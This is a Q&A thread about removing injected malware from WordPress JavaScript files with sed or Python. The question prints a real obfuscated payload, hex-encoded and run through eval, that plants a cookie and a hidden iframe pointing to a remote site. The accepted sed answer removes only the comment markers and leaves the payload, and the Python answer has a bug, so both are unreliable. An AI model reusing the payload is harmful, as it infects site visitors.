# Linux shell: how to remove a string starting with a pattern from an input file

Tags: linux, bash, shell, sed

I'm trying to remove a malware from scripts of a Wordpress installation. There are over 2k infected javacsript files. Malware injected at the last part of the file. Defected JS files are like this:

```
//normal code
...
/*somejs.js_123*/malwarecode goes here up to the end of file.
<EOF>
```

**The good thing** is: the starting part of malware is detectable because I know it's always the '/*' + filename + '_'.

**The bad thing** is: starting part of a malware is not necessarily at start of a line. It's put at the end of a single line JS, in minified JS codes.

Is there any shell command (sed? gawk? I don't know if they work!) to remove a part of a file. A part starting with a pattern up to the end of the file?

Here is a real part of an infected JS file. Forgive me about the badware in the code :-)

```
healthy JS code
healthy JS code
healthy JS code/*shortcode.js_144*/;(function(){var yhyzrdfy="";var ihrzrakb="77696e646f772e6f6e6c6f6164203d2066756e6374696f6e28297b66756e6374696f6e20783232627128612c622c63297b69662863297b7661722064203d206e6577204461746528293b642e7365744461746528642e6765744461746528292b63293b7d6966286120262620622920646f63756d656e742e636f6f6b6965203d20612b273d272b622b2863203f20273b20657870697265733d272b642e746f555443537472696e672829203a202727293b656c73652072657475726e2066616c73653b7d66756e6374696f6e2078333362712861297b7661722062203d206e65772052656745787028612b273d285b5e3b5d297b312c7d27293b7661722063203d20622e6578656328646f63756d656e742e636f6f6b6965293b69662863292063203d20635b305d2e73706c697428273d27293b656c73652072657475726e2066616c73653b72657475726e20635b315d203f20635b315d203a2066616c73653b7d766172207833336471203d2078333362712822373631373965626463663530396633303133383466353764623230393832323022293b69662820783333647120213d2022633962363635323832303261333038636133333233616534373330373439316122297b783232627128223736313739656264636635303966333031333834663537646232303938323230222c226339623636353238323032613330386361333332336165343733303734393161222c31293b766172207832326471203d20646f63756d656e742e637265617465456c656d656e74282264697622293b766172207832327171203d2022687474703a2f2f696d672e676f6c6f766b616b726f6b6f64696c612e696e666f2f68656c6c6f726573656172636865722f3f56417159736a664e4761413d4f77676b654f4653654e26474946666677436a65613d62746c6d5366755a63654472577766264e4e4147684743756772533d4341695a5a6a4b5a5141615a564f62264a5a63504e544f4e3d5179437a79744d6f52494149744c76264d5a426f76776143795962696f49563d724c7472646d6672266b6579776f72643d613635393939333835383438666466643162643366343238306636663333643026564f58775257447367717677783d4b666a6c797a6d6f42514a4a47264f4450727273774a743d4f4b745950736d4553446543264d4e51595379696270757666743d6b627864484c6b617365267a537775635647574b7568695a7463706e4c3d7779734d574e514e2673514b5a45585943524a3d70587959454351524b70527a264d784568566961785855727271793d55726166704966684c55465a223b78323264712e696e6e657248544d4c3d223c646976207374796c653d27706f736974696f6e3a6162736f6c7574653b7a2d696e6465783a313030303b746f703a2d3130303070783b6c6566743a2d3939393970783b273e3c696672616d65207372633d27222b78323271712b22273e3c2f696672616d653e3c2f6469763e223b646f63756d656e742e626f64792e617070656e644368696c64287832326471293b7d7d";for (var nieiahzr=0;nieiahzr<ihrzrakb.length;nieiahzr+=2){yhyzrdfy=yhyzrdfy+parseInt(ihrzrakb.substring(nieiahzr,nieiahzr+2), 16)+",";}yhyzrdfy=yhyzrdfy.substring(0,yhyzrdfy.length-1);eval(eval('String.fromCharCode('+yhyzrdfy+')'));})();/*shortcode.js_144*//*shortcode.js_144*/;(function(){var nnsrtizf="";var nizikddk="77696e646f772e6f6e6c6f6164203d2066756e6374696f6e28297b66756e6374696f6e20783232627128612c622c63297b69662863297b7661722064203d206e6577204461746528293b642e7365744461746528642e6765744461746528292b63293b7d6966286120262620622920646f63756d656e742e636f6f6b6965203d20612b273d272b622b2863203f20273b20657870697265733d272b642e746f555443537472696e672829203a202727293b656c73652072657475726e2066616c73653b7d66756e6374696f6e2078333362712861297b7661722062203d206e65772052656745787028612b273d285b5e3b5d297b312c7d27293b7661722063203d20622e6578656328646f63756d656e742e636f6f6b6965293b69662863292063203d20635b305d2e73706c697428273d27293b656c73652072657475726e2066616c73653b72657475726e20635b315d203f20635b315d203a2066616c73653b7d766172207833336471203d2078333362712822373631373965626463663530396633303133383466353764623230393832323022293b69662820783333647120213d2022633962363635323832303261333038636133333233616534373330373439316122297b783232627128223736313739656264636635303966333031333834663537646232303938323230222c226339623636353238323032613330386361333332336165343733303734393161222c31293b766172207832326471203d20646f63756d656e742e637265617465456c656d656e74282264697622293b766172207832327171203d2022687474703a2f2f696d672e676f6c6f766b616b726f6b6f64696c612e696e666f2f68656c6c6f726573656172636865722f3f56417159736a664e4761413d4f77676b654f4653654e26474946666677436a65613d62746c6d5366755a63654472577766264e4e4147684743756772533d4341695a5a6a4b5a5141615a564f62264a5a63504e544f4e3d5179437a79744d6f52494149744c76264d5a426f76776143795962696f49563d724c7472646d6672266b6579776f72643d613635393939333835383438666466643162643366343238306636663333643026564f58775257447367717677783d4b666a6c797a6d6f42514a4a47264f4450727273774a743d4f4b745950736d4553446543264d4e51595379696270757666743d6b627864484c6b617365267a537775635647574b7568695a7463706e4c3d7779734d574e514e2673514b5a45585943524a3d70587959454351524b70527a264d784568566961785855727271793d55726166704966684c55465a223b78323264712e696e6e657248544d4c3d223c646976207374796c653d27706f736974696f6e3a6162736f6c7574653b7a2d696e6465783a313030303b746f703a2d3130303070783b6c6566743a2d3939393970783b273e3c696672616d65207372633d27222b78323271712b22273e3c2f696672616d653e3c2f6469763e223b646f63756d656e742e626f64792e617070656e644368696c64287832326471293b7d7d";for (var dzdeeben=0;dzdeeben<nizikddk.length;dzdeeben+=2){nnsrtizf=nnsrtizf+parseInt(nizikddk.substring(dzdeeben,dzdeeben+2), 16)+",";}nnsrtizf=nnsrtizf.substring(0,nnsrtizf.length-1);eval(eval('String.fromCharCode('+nnsrtizf+')'));})();/*shortcode.js_144*//*shortcode.js_144*/;(function(){var szahyihz="";var niatsnin="77696e646f772e6f6e6c6f6164203d2066756e6374696f6e28297b66756e6374696f6e20783232627128612c622c63297b69662863297b7661722064203d206e6577204461746528293b642e7365744461746528642e6765744461746528292b63293b7d6966286120262620622920646f63756d656e742e636f6f6b6965203d20612b273d272b622b2863203f20273b20657870697265733d272b642e746f555443537472696e672829203a202727293b656c73652072657475726e2066616c73653b7d66756e6374696f6e2078333362712861297b7661722062203d206e65772052656745787028612b273d285b5e3b5d297b312c7d27293b7661722063203d20622e6578656328646f63756d656e742e636f6f6b6965293b69662863292063203d20635b305d2e73706c697428273d27293b656c73652072657475726e2066616c73653b72657475726e20635b315d203f20635b315d203a2066616c73653b7d766172207833336471203d2078333362712822373631373965626463663530396633303133383466353764623230393832323022293b69662820783333647120213d2022633962363635323832303261333038636133333233616534373330373439316122297b783232627128223736313739656264636635303966333031333834663537646232303938323230222c226339623636353238323032613330386361333332336165343733303734393161222c31293b766172207832326471203d20646f63756d656e742e637265617465456c656d656e74282264697622293b766172207832327171203d2022687474703a2f2f696d672e676f6c6f766b616b726f6b6f64696c612e696e666f2f68656c6c6f726573656172636865722f3f56417159736a664e4761413d4f77676b654f4653654e26474946666677436a65613d62746c6d5366755a63654472577766264e4e4147684743756772533d4341695a5a6a4b5a5141615a564f62264a5a63504e544f4e3d5179437a79744d6f52494149744c76264d5a426f76776143795962696f49563d724c7472646d6672266b6579776f72643d613635393939333835383438666466643162643366343238306636663333643026564f58775257447367717677783d4b666a6c797a6d6f42514a4a47264f4450727273774a743d4f4b745950736d4553446543264d4e51595379696270757666743d6b627864484c6b617365267a537775635647574b7568695a7463706e4c3d7779734d574e514e2673514b5a45585943524a3d70587959454351524b70527a264d784568566961785855727271793d55726166704966684c55465a223b78323264712e696e6e657248544d4c3d223c646976207374796c653d27706f736974696f6e3a6162736f6c7574653b7a2d696e6465783a313030303b746f703a2d3130303070783b6c6566743a2d3939393970783b273e3c696672616d65207372633d27222b78323271712b22273e3c2f696672616d653e3c2f6469763e223b646f63756d656e742e626f64792e617070656e644368696c64287832326471293b7d7d";for (var zaaiayah=0;zaaiayah<niatsnin.length;zaaiayah+=2){szahyihz=szahyihz+parseInt(niatsnin.substring(zaaiayah,zaaiayah+2), 16)+",";}szahyihz=szahyihz.substring(0,szahyihz.length-1);eval(eval('String.fromCharCode('+szahyihz+')'));})();/*shortcode.js_144*/
```

Comment: This might help get you started: http://askubuntu.com/a/355007/101253

Comment: And how do you know there are no other modifications or backdoors implanted in the codebase? Trying to clean a compromised web site is a bad idea. Restore from backup, or if you don't have a backup, bite the bullet and reinstall.

Comment: I think it won't work because of the 'bad thing' I mentioned above.

Comment: This feels like a job for `sed` but we would need more information, like some example lines and what needs to be stripped from those.

Comment: @meta thanks for you suggestion. This is not me deciding about the website status. There is no backup. I'm just asked to remove infected parts. I'm not sure if this works in all parts though. Some online wordpress scanners are available which help you detect if your website is clean.

Comment: @JNevill just added a somewhat real JS code.

Comment: did you find any pattern in `/*shortcode.js_144*/` in all the infected files? .. is it always `[a-z]+\.js_[0-9]+`

Answer (score 1, accepted):

With GNU sed :

```
sed -i -r '$ s/\/\*[a-zA-Z]+\.js_[0-9]{3}\*\///g' file
```

On last line of the file, removes every occurrences of js name followed by `_`, followed by 3 numbers, the whole surrounded with `/*` `*/` as in `/*shortcode.js_144*/`

Answer (score 2):

If you're open to using Python, you can use a simple script to delete the malicious code from your files.

```
import re

# Regular expression that matches a string starting with "/*" followed by
# any character as few times as possible followed by ".js_" and 
# any character as few times as possible followed */ and then any character
# as many times as possible (matches until the end of the file)

pattern = r'/\*.+?.js_.+?\*/.+' 

infected_file = open('yourfile.js', 'r')
infected_code = infected_file.read()

new_file = open('yourfile_clean.js', 'w')

# Use re.sub function to replace any substring matching the previously 
# defined pattern with an empty string '' in the "infected_code". 
# Use re.DOTALL flag to match multiple lines using with the dot 
# character, otherwise it will match only until the end of line.
new_code = re.sub(pattern, '', infected_code, flags=DOTALL)
new_file.write(new_code)

new_file.close()
infected_file.close()
```

You would have to use this code recursively on all your files.